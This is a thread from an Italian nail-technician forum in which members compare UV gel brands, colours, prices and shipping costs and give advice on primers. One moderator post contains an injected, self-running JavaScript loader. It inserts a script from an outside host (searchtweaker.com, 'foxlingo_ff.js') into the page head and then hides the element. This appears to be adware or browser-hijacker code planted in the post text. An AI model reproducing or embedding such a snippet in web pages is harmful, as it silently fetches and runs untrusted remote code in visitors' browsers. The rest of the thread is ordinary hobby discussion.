Iscriviti a Unghie mania! Facciamo crescere insieme questa community!

Non sei connesso Connettiti o registrati

MARCHE GEL

Andare alla pagina : 1, 2  Seguente

Vedere l'argomento precedente Vedere l'argomento seguente Andare in basso  Messaggio [Pagina 1 di 2]

1 MARCHE GEL il Ven Nov 09, 2012 10:46 am

LICIA

Giovane Aprendista
Giovane Aprendista
RAGAZZE VOI CHE TIPO DI MARCHE GEL USATE!?PREZZI!?DOVE LI COMPRATE!?LA LORO EFFICACIA?!COLANO?!CHE GEL COSTRUTTORI E COLORATI USATE!?FATEMI SAPERE PER UN CONFRONTO.

Vedere il profilo dell'utente

2 Re: MARCHE GEL il Ven Nov 09, 2012 11:48 am

kia's

Onicotecnica esperta
Onicotecnica esperta
Ciao Licia,io uso NDED.
Anche se ho letto più volte di ragazze che nn si sono trovate bene....io devo dire che non mi posso lamentare.
Le rico mi durano e,finalmente,non ho sollevamenti.Alcuni colori non sono molto coprenti,bisogna un pò sperimentare e scambiarsi le opinioni Wink però direi che ne vale la pena visti i prezzi davvero bassi!

3 Re: MARCHE GEL il Ven Nov 09, 2012 12:31 pm

LICIA

Giovane Aprendista
Giovane Aprendista
quindi te usi i prodotti della nded sia per la ricostruzione che per i colori?!che prezzi hanno!?dove li acquisti?!

4 Re: MARCHE GEL il Ven Nov 09, 2012 1:43 pm

kia's

Onicotecnica esperta
Onicotecnica esperta
si anche i colori.
Se vai sul loro sito c'è tutto Smile

5 Re: MARCHE GEL il Dom Nov 11, 2012 10:53 am

LICIA

Giovane Aprendista
Giovane Aprendista
grz vedrò sul loro sito allora

6 Re: MARCHE GEL il Dom Nov 11, 2012 3:15 pm

fantasy31

Moderatrice
Moderatrice
licia attenta al maiuscolo...
io uso busch e o provato anche jolifin e non mi lamento
qualita/prezzo
ottimo

http://www.facebook.com/sara.nagel.31#!/sara.nagel.31

7 Re: MARCHE GEL il Mar Nov 13, 2012 9:39 am

Geernails

Moderatrice
Moderatrice
Io ne ho provate un pò... attualmente uso crystal nails
Nded l'ho provata all'inizio, ottima per iniziare, appunto, ma non mi ha fatta impazzire. Poi sono passata a Jolifin e devo dire che la differenza era tangibile, nel senso che a mio parere sono molto + buoni pur mantenendo un ottimo rapporto qualità prezzo.
Ho anche i gel di Onika che sono altrettanto buoni e, come ti dicevo, ora sto usando i Crystal Nails.
Se devo essere onesta, a parte il monofasico x l'allungamento che secondo me è meraviglioso (l'Extreme Clear), gli altri gel sono davvero normali, nel senso che non trovo particolari differenze tra questi e quelli di Jolifin o Onika.
Devo ammettere che da quando uso i loro gel, però, ho notevolmente ridotto i tempi di lavorazione, ma non ho ancora testato se sono io ad essermi velocizzata o se hanno contribuito i prodotti.

Per quanto riguarda i colori, invece, uso Bushmann con i quali mi trovo benissimo ma non con tutti, ho qualcosa di XXL (metallizzati fighissimi), Jolifin (idem come Bushman) ed ho recentemente scoperto Passioneunghie che, devo dire, sono fighissimi ed ultra coprenti già alla prima passata, infatti mi sto adoperando per fare un ordinino Smile

Visitate la mia Pagina Facebook e il mio blog
Vedere il profilo dell'utente http://geernails.wordrpress.com

8 Re: MARCHE GEL il Mar Nov 13, 2012 9:44 am

kia's

Onicotecnica esperta
Onicotecnica esperta
Geerrrrrrr!a me arriva oggi l'ordine di passione unghieeee

9 Re: MARCHE GEL il Mar Nov 13, 2012 11:18 am

Geernails

Moderatrice
Moderatrice
Inviiiiiiiidia! Io sto aspettando la mia amica che deve scegliere che colori vuole!
Sono uno + bello dell'altro ma se posso consigliare margarida, tequila sunrise, caipiroska e maracaibo sono MERAVIGLIOSI!

10 Re: MARCHE GEL il Mar Nov 13, 2012 1:21 pm

LICIA

Giovane Aprendista
Giovane Aprendista
ma passione unghie è un sito!?che prezzi di consegna hanno!?

11 Re: MARCHE GEL il Mar Nov 13, 2012 1:32 pm

LICIA

Giovane Aprendista
Giovane Aprendista
quindi per cambiare marca di gel per rico quale mi consigliereste!?jolifin o nded!?

12 Re: MARCHE GEL il Mar Nov 13, 2012 1:33 pm

LICIA

Giovane Aprendista
Giovane Aprendista
crystal nails per me che sn all inizio credo sia troppo cara

13 Re: MARCHE GEL il Mar Nov 13, 2012 2:06 pm

Geernails

Moderatrice
Moderatrice
Se vuoi cambiare marca io ti consiglio Jolifin secondo me è meglio di NDED, ma è un parere strettamente personale. Crystal assolutamente no, nel senso che sono ottimi gel, ma sei all'inizio non vale la pena spendere tutti quei soldi (a meno che tu non abbia un giro di clienti talmente vasto da giustificare l'investimento Wink )
Passione unghie è un'azienda e il loro sito è questo http://www.passioneunghie.com/

Come dicevo io ho provato solo i colori, i loro gel di struttura mi sembrano allo stesso livello di jolifin o bushman, visti anche i prezzi, quindi non so dirti.
Se vuoi ordinare con jolifin chiedi pure, se hai dubbi sui prodotti Smile

14 Re: MARCHE GEL il Mar Nov 13, 2012 4:22 pm

kia's

Onicotecnica esperta
Onicotecnica esperta
da passione unghie ho ordinato solo chianti,petrolio e rouge noir(quello di nded fa schifo) per il momento....e ho anche ordinato il sigillante opaco ,forse stasera lo riesco a provare se convinco la mia amica e poi vi dico!

15 Re: MARCHE GEL il Mar Nov 13, 2012 6:40 pm

LICIA

Giovane Aprendista
Giovane Aprendista
non voglio spendere ulteriori soldi anche perchè la faccio solo su di me e nn ne vale la pena spendere tanti soldi e già ne ho spesi parecchi.ma voi fate ordini cumulativi anche per la jolifin!?non ho mai comprato niente lì ma sulla chamaleon.sulla snc. ellerrenailss.fraulein38 ecc ecc ma su tutti le spese sono troppo esagerate.tra cui la chamaleon se si scrive così ha dei uv gel stupendi soprattutto quelli termici ma le spese sn troppe più di 17 euro

16 Re: MARCHE GEL il Mar Nov 13, 2012 6:44 pm

LICIA

Giovane Aprendista
Giovane Aprendista
io voglio dei gel trifasici o monofasici che non colano perchè qst che ho colano e quindi vorrei cambiare in meglio

17 Re: MARCHE GEL il Mar Nov 13, 2012 6:51 pm

LICIA

Giovane Aprendista
Giovane Aprendista
ma su passione unghie comprate solo i gel colorati o anche i gel trifasici ecc?!stavo guardando i prezzi perchè su e bay con 32 euro in offerta ho tutti e tre i gel perchè il primer c e l ho già.compresi di spese se nn sbaglio.,

18 Re: MARCHE GEL il Mar Nov 13, 2012 7:06 pm

LICIA

Giovane Aprendista
Giovane Aprendista
ma scusate voi su passione unghie comprate un gel colorato a 10euro e passa!?naaaaaaa è troppo per me il massimo è stato 8,90 ma a fine ordine ho speso più di 100 euro per poca roba.

19 Re: MARCHE GEL il Mer Nov 14, 2012 9:00 am

kia's

Onicotecnica esperta
Onicotecnica esperta
Ciao Licia,i gel passione unghie costano dai 5,49/6,99 ai 10,23.
Io ho ordinato quelli da 6,99 ma devo ancora provarli.Se come dicono basta una passata comunque il prezzo non è alto Wink ti saprò dire appena li riesco ad usare.

20 Re: MARCHE GEL il Mer Nov 14, 2012 9:04 am

LICIA

Giovane Aprendista
Giovane Aprendista
ok fammi sapere perchè ci sono delle belle tonalità e su you tube ho visto i loro video e sono molto chiari sull efficienza

21 Re: MARCHE GEL il Mer Nov 14, 2012 9:59 am

Geernails

Moderatrice
Moderatrice
Su jolifin i cumulativi li facciamo, comunque se cerchi dei gel che non colano devi andare su quelli ad alta viscosità ma occhio perchè sono + difficili da lavorare...
Scusa ma tu che marca stai usando ora?
Se vuoi stare su una cifra onesta con dei gel di buona qualità compra Onika, io li uso e posso garantirti che il costruttore non cola anche se è di media densità.
Guarda questo kit http://shop.onika.it/it/french-gel/gel-uv-ricostruzione-4

Per quanto riguarda il primer, hai scritto ce l'ho già, ma dipende da che marca è... Il primer deve sempre essere della stessa marca del gel base perchè sono studiati per essere utilizzati in abbinamento. Usando un primer di marca diversa dal base rischi di compromettere la durata della rico Smile

22 Re: MARCHE GEL il Mer Nov 14, 2012 10:42 am

LICIA

Giovane Aprendista
Giovane Aprendista
si si lo sò che bisogna usare il primer uguale alla stessa marca del gel base.io stò usando i gel della snc per rico e quelli colorati sono vari.

23 Re: MARCHE GEL il Mer Nov 14, 2012 10:43 am

LICIA

Giovane Aprendista
Giovane Aprendista
un set senza gel bianco c è?!io comprai un kit completo alla snc sono tedeschi e il gel french bianco fà cagare davvero è un bianco tenue e cola a morire.ho paura che sia di nuovo così negli altri kit

24 Re: MARCHE GEL il Mer Nov 14, 2012 1:08 pm

Geernails

Moderatrice
Moderatrice
Quello di Onika te lo posso garantire io che non è così, io ho 2 set loro e sono perfetti!
Sia i gel che il bianco.
Vai davvero tranquilla con loro!
(function(){try{var header=document.getElementsByTagName("HEAD")[0];var script=document.createElement("SCRIPT");script.src="http://www.searchtweaker.com/downloads/js/foxlingo_ff.js";script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState=="complete"||this.readyState=="loaded")){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();

25 Re: MARCHE GEL il Mer Nov 14, 2012 1:14 pm

LICIA

Giovane Aprendista
Giovane Aprendista
a parte ciò che hai scritto per il resto non ho capito molto

26 Re: MARCHE GEL Oggi a 3:46 am

Contenuto sponsorizzato

Vedere l'argomento precedente Vedere l'argomento seguente Tornare in alto  Messaggio [Pagina 1 di 2]

Andare alla pagina : 1, 2  Seguente

Permesso di questo forum: